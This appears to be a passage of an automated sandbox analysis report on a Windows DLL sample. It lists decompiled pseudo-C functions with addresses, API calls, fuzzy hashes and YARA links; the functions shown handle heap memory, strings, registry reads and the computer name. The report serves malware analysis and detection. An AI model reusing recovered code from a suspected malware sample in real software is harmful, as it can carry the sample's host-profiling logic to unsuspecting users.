					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E031A4A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x31ad270, 0, _t25);
				}
				return _t22;
			}











                                                                                                                                  0x031a117a
                                                                                                                                  0x031a118b
                                                                                                                                  0x031a118f
                                                                                                                                  0x031a11ea
                                                                                                                                  0x031a1191
                                                                                                                                  0x031a1198
                                                                                                                                  0x031a11a0
                                                                                                                                  0x031a11a3
                                                                                                                                  0x031a11a8
                                                                                                                                  0x031a11ac
                                                                                                                                  0x031a11b2
                                                                                                                                  0x031a11ba
                                                                                                                                  0x031a11bd
                                                                                                                                  0x031a11d5
                                                                                                                                  0x031a11d5
                                                                                                                                  0x031a11e0
                                                                                                                                  0x031a11e0
                                                                                                                                  0x031a11f1

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05BD9364), ref: 031A11B2
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05BD9364), ref: 031A11E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1500278894-8415677
                                                                                                                                  • Opcode ID: 8227d61cfa7224e4efca64fd9c854001976f195bf72daae1b299eadef43c8073
                                                                                                                                  • Instruction ID: 9ac92e96063ed2d18d1f3b804adb5273778dd08a3769d1fa2be8af743fa86bc2
                                                                                                                                  • Opcode Fuzzy Hash: 8227d61cfa7224e4efca64fd9c854001976f195bf72daae1b299eadef43c8073
                                                                                                                                  • Instruction Fuzzy Hash: 7201843A210A09BBDB21AFA9DC44EAF7B79FF8D755F000026FA409A190DB71D954D760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A5141, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                  			E031A5141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E031A75F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x31ac2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                                                  0x031a5145
                                                                                                                                  0x031a5152
                                                                                                                                  0x031a5154
                                                                                                                                  0x031a5155
                                                                                                                                  0x031a515d
                                                                                                                                  0x031a515d
                                                                                                                                  0x031a5161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a5158
                                                                                                                                  0x031a5159
                                                                                                                                  0x031a515c
                                                                                                                                  0x031a515c
                                                                                                                                  0x031a5169
                                                                                                                                  0x031a516e
                                                                                                                                  0x031a5173
                                                                                                                                  0x031a517b
                                                                                                                                  0x031a5181
                                                                                                                                  0x031a5183
                                                                                                                                  0x031a5186
                                                                                                                                  0x031a518a
                                                                                                                                  0x031a518c
                                                                                                                                  0x031a518f
                                                                                                                                  0x031a518f
                                                                                                                                  0x031a5190
                                                                                                                                  0x031a5192
                                                                                                                                  0x031a518f
                                                                                                                                  0x031a519c
                                                                                                                                  0x031a519f
                                                                                                                                  0x031a51a2
                                                                                                                                  0x031a51a3
                                                                                                                                  0x031a51a5
                                                                                                                                  0x031a51ac
                                                                                                                                  0x031a51ac
                                                                                                                                  0x031a51b8

                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,00000000,05BD95AC,031A5390,?,031A935C,?,05BD95AC,?,031A5390), ref: 031A515D
                                                                                                                                  • StrTrimA.SHLWAPI(?,031AC2A4,00000002,?,031A935C,?,05BD95AC,?,031A5390), ref: 031A517B
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,?,031A935C,?,05BD95AC,?,031A5390), ref: 031A5186
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Trim
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3043112668-0
                                                                                                                                  • Opcode ID: a0b5f44fcc6ce45c5123d3b24e7e6b85eae26dc35cabc53f391d2e58ac6522dc
                                                                                                                                  • Instruction ID: 596136b402f62ce55b132f802e452708c3e9e71bb9973eb417040da650194c75
                                                                                                                                  • Opcode Fuzzy Hash: a0b5f44fcc6ce45c5123d3b24e7e6b85eae26dc35cabc53f391d2e58ac6522dc
                                                                                                                                  • Instruction Fuzzy Hash: 3001B535308B466FD7219A6E8C54F777B9EEF8E246F094011B995CB242D770C842C6A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1F72, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 32%
                                                                                                                                  			E031A1F72(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6fa7e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                                                                                                  0x031a1f79
                                                                                                                                  0x031a1f86
                                                                                                                                  0x031a1f88
                                                                                                                                  0x031a1f8b
                                                                                                                                  0x031a1fd0
                                                                                                                                  0x031a1fd8
                                                                                                                                  0x031a1fde
                                                                                                                                  0x031a1fe2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1f8f
                                                                                                                                  0x031a1f95
                                                                                                                                  0x031a1f9d
                                                                                                                                  0x031a1fce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1f9f
                                                                                                                                  0x031a1f9f
                                                                                                                                  0x031a1fa9
                                                                                                                                  0x031a1fad
                                                                                                                                  0x031a1fb6
                                                                                                                                  0x031a1fbe
                                                                                                                                  0x031a1fec
                                                                                                                                  0x031a1fc0
                                                                                                                                  0x031a1fc0
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1fc0
                                                                                                                                  0x031a1fbe
                                                                                                                                  0x031a1fa9
                                                                                                                                  0x031a1fef
                                                                                                                                  0x031a1ff6
                                                                                                                                  0x031a1ff6
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A1F8F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,031A46B9,00000000,?,?), ref: 031A1FE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1452528299-3251738875
                                                                                                                                  • Opcode ID: 409faa901fef452ca510924796c9d175d4a5dbd6dc2337f8d4c569687d4f5d37
                                                                                                                                  • Instruction ID: 19423913f97e527ae87c59a33c9fabf96ae06f4152ff94d2940db66b7e94f7ee
                                                                                                                                  • Opcode Fuzzy Hash: 409faa901fef452ca510924796c9d175d4a5dbd6dc2337f8d4c569687d4f5d37
                                                                                                                                  • Instruction Fuzzy Hash: BA015679904548FBDF10DFAAD848DAEBFBCEB8C752F108076E511E6145D7708688DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4AAB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4AAB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x31ad270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                  0x031a4ab7
                                                                                                                                  0x031a4abd

                                                                                                                                  APIs
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: 372af91ea904c5e2283a96fc2353fc8bbacadd15bac65d642dcc13e51ff4bf15
                                                                                                                                  • Instruction ID: a98f59185553579d062f5a1870be578e4090aad78f650fff3d352a84287deef7
                                                                                                                                  • Opcode Fuzzy Hash: 372af91ea904c5e2283a96fc2353fc8bbacadd15bac65d642dcc13e51ff4bf15
                                                                                                                                  • Instruction Fuzzy Hash: CBB012B5100A00ABCE256B50EF04F05BA31B79C702F014012B30440078C7314460FB35
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A144D, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                  			E031A144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E031A3DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x31ad2e0; // 0x2a2a5a8
						_t20 = _t68 + 0x31ae1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E031A47EB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                  0x031a1453
                                                                                                                                  0x031a1456
                                                                                                                                  0x031a1466
                                                                                                                                  0x031a146f
                                                                                                                                  0x031a1473
                                                                                                                                  0x031a1541
                                                                                                                                  0x031a1547
                                                                                                                                  0x031a1547
                                                                                                                                  0x031a148d
                                                                                                                                  0x031a1492
                                                                                                                                  0x031a1496
                                                                                                                                  0x031a149c
                                                                                                                                  0x031a14a1
                                                                                                                                  0x031a14a8
                                                                                                                                  0x031a14b7
                                                                                                                                  0x031a14b7
                                                                                                                                  0x031a14bb
                                                                                                                                  0x031a14bd
                                                                                                                                  0x031a14c9
                                                                                                                                  0x031a14d4
                                                                                                                                  0x031a14df
                                                                                                                                  0x031a14e3
                                                                                                                                  0x031a14ed
                                                                                                                                  0x031a14f1
                                                                                                                                  0x031a14f3
                                                                                                                                  0x031a14f8
                                                                                                                                  0x031a14ff
                                                                                                                                  0x031a150f
                                                                                                                                  0x031a150f
                                                                                                                                  0x031a14f8
                                                                                                                                  0x031a14f1
                                                                                                                                  0x031a1511
                                                                                                                                  0x031a1516
                                                                                                                                  0x031a151b
                                                                                                                                  0x031a151b
                                                                                                                                  0x031a151e
                                                                                                                                  0x031a1527
                                                                                                                                  0x031a152c
                                                                                                                                  0x031a152c
                                                                                                                                  0x031a1531
                                                                                                                                  0x031a1536
                                                                                                                                  0x031a1536
                                                                                                                                  0x031a1531
                                                                                                                                  0x031a14bb
                                                                                                                                  0x031a1538
                                                                                                                                  0x031a153e
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A3DA0: SysAllocString.OLEAUT32(80000002), ref: 031A3DFD
                                                                                                                                    • Part of subcall function 031A3DA0: SysFreeString.OLEAUT32(00000000), ref: 031A3E63
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 031A152C
                                                                                                                                  • SysFreeString.OLEAUT32(031A28D9), ref: 031A1536
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                  • Opcode ID: c24b31b91c3c179eae540687b4832b7f2e7927128851d5315e7456151515962f
                                                                                                                                  • Instruction ID: edf11cda0c551d10630188893f4c8d3f5df222f896e8aac3ff64e01afd8bd60c
                                                                                                                                  • Opcode Fuzzy Hash: c24b31b91c3c179eae540687b4832b7f2e7927128851d5315e7456151515962f
                                                                                                                                  • Instruction Fuzzy Hash: ED311A7A900619BFCB15DF69C888C9BBB79FBCE741B144668F8069B210D731DD51CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4B28, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E031A63F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x31ad270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E031A1E47(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                                                                                                  0x031a4b28
                                                                                                                                  0x031a4b30
                                                                                                                                  0x031a4b47
                                                                                                                                  0x031a4b62
                                                                                                                                  0x031a4b66
                                                                                                                                  0x031a4b6b
                                                                                                                                  0x031a4b6d
                                                                                                                                  0x031a4b7f
                                                                                                                                  0x031a4b8b
                                                                                                                                  0x031a4b6f
                                                                                                                                  0x031a4b6f
                                                                                                                                  0x031a4b74
                                                                                                                                  0x031a4b79
                                                                                                                                  0x031a4b79
                                                                                                                                  0x031a4b6d
                                                                                                                                  0x031a4b91
                                                                                                                                  0x031a4b95
                                                                                                                                  0x031a4b95
                                                                                                                                  0x031a4b3c
                                                                                                                                  0x031a4b41
                                                                                                                                  0x031a4b45
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1E47: SysFreeString.OLEAUT32(00000000), ref: 031A1EAA
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,031A506B,?,004F0053,05BD9370,00000000,?), ref: 031A4B8B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$HeapString
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3806048269-8415677
                                                                                                                                  • Opcode ID: 0487737e5c0d1e286c947f7db6571b7a1455ac271365d23e56dc5d2b7b2f8e91
                                                                                                                                  • Instruction ID: fa328db68554849977bdacac74a0766bf892f8fa6890f41f39bef76341291f76
                                                                                                                                  • Opcode Fuzzy Hash: 0487737e5c0d1e286c947f7db6571b7a1455ac271365d23e56dc5d2b7b2f8e91
                                                                                                                                  • Instruction Fuzzy Hash: FD01443A100A19BBDF22DF59CC01FDA7BA5EF0C791F098025FE049A221DB71C560D790
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1BBF, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E031A1BBF(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E031A75F6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E031A4AAB(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                  0x031a1bc4
                                                                                                                                  0x031a1bcf
                                                                                                                                  0x031a1bd1
                                                                                                                                  0x031a1bd7
                                                                                                                                  0x031a1bd9
                                                                                                                                  0x031a1bde
                                                                                                                                  0x031a1be7
                                                                                                                                  0x031a1beb
                                                                                                                                  0x031a1bf4
                                                                                                                                  0x031a1bf8
                                                                                                                                  0x031a1c07
                                                                                                                                  0x031a1bfa
                                                                                                                                  0x031a1bfb
                                                                                                                                  0x031a1c00
                                                                                                                                  0x031a1c00
                                                                                                                                  0x031a1bf8
                                                                                                                                  0x031a1beb
                                                                                                                                  0x031a1c10

                                                                                                                                  APIs
                                                                                                                                  • GetComputerNameExA.KERNEL32(00000003,00000000,031A4531,74E5F710,00000000,?,?,031A4531), ref: 031A1BD7
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetComputerNameExA.KERNEL32(00000003,00000000,031A4531,031A4532,?,?,031A4531), ref: 031A1BF4
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ComputerHeapName$AllocateFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 187446995-0
                                                                                                                                  • Opcode ID: 0f188f04b82a45c3ed765eb8e8d2cdf79b5f0c23f974c9e5f85616b3040820e3
                                                                                                                                  • Instruction ID: 46b6dd307226e9ea74be7234cbe9ae2b28706aafd086396f26de714db35f9adb
                                                                                                                                  • Opcode Fuzzy Hash: 0f188f04b82a45c3ed765eb8e8d2cdf79b5f0c23f974c9e5f85616b3040820e3
                                                                                                                                  • Instruction Fuzzy Hash: 89F0542E600605BBEB11D69E8E01FAF77BCDBC9662F150069E905D7149EB70DA019670
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A18D8, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x31ad274) == 0) {
						E031A4450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x31ad274) == 1) {
						_t10 = E031A262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                                                  0x031a18df
                                                                                                                                  0x031a18e0
                                                                                                                                  0x031a18e3
                                                                                                                                  0x031a1915
                                                                                                                                  0x031a1917
                                                                                                                                  0x031a1917
                                                                                                                                  0x031a18e5
                                                                                                                                  0x031a18e6
                                                                                                                                  0x031a18fb
                                                                                                                                  0x031a1902
                                                                                                                                  0x031a1904
                                                                                                                                  0x031a1904
                                                                                                                                  0x031a1902
                                                                                                                                  0x031a18e6
                                                                                                                                  0x031a191f

                                                                                                                                  APIs
                                                                                                                                  • InterlockedIncrement.KERNEL32(031AD274), ref: 031A18ED
                                                                                                                                    • Part of subcall function 031A262F: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A2642
                                                                                                                                  • InterlockedDecrement.KERNEL32(031AD274), ref: 031A190D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3834848776-0
                                                                                                                                  • Opcode ID: 9c1d19a4a5ed1aabe8a492dc0377b819f0f808b7cc172808d2f487ad76af6d3e
                                                                                                                                  • Instruction ID: 4ef0a333319193b0d258a336eef08304142b4d336cc5548e4a4de84184a1abfe
                                                                                                                                  • Opcode Fuzzy Hash: 9c1d19a4a5ed1aabe8a492dc0377b819f0f808b7cc172808d2f487ad76af6d3e
                                                                                                                                  • Instruction Fuzzy Hash: D0E09A2D248F227BCA61EA6C980471BAA04AB0C6C3F0A4538A486C102AC720C8C2C2E2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1E47, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                  			E031A1E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x31ad2e0; // 0x2a2a5a8
				_t4 = _t15 + 0x31ae39c; // 0x5bd8944
				_t20 = _t4;
				_t6 = _t15 + 0x31ae124; // 0x650047
				_t17 = E031A144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E031A25D6(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                  0x031a1e51
                                                                                                                                  0x031a1e58
                                                                                                                                  0x031a1e59
                                                                                                                                  0x031a1e5a
                                                                                                                                  0x031a1e5b
                                                                                                                                  0x031a1e61
                                                                                                                                  0x031a1e66
                                                                                                                                  0x031a1e66
                                                                                                                                  0x031a1e70
                                                                                                                                  0x031a1e82
                                                                                                                                  0x031a1e89
                                                                                                                                  0x031a1eb7
                                                                                                                                  0x031a1e8b
                                                                                                                                  0x031a1e8d
                                                                                                                                  0x031a1e92
                                                                                                                                  0x031a1eb4
                                                                                                                                  0x031a1e94
                                                                                                                                  0x031a1e97
                                                                                                                                  0x031a1e9e
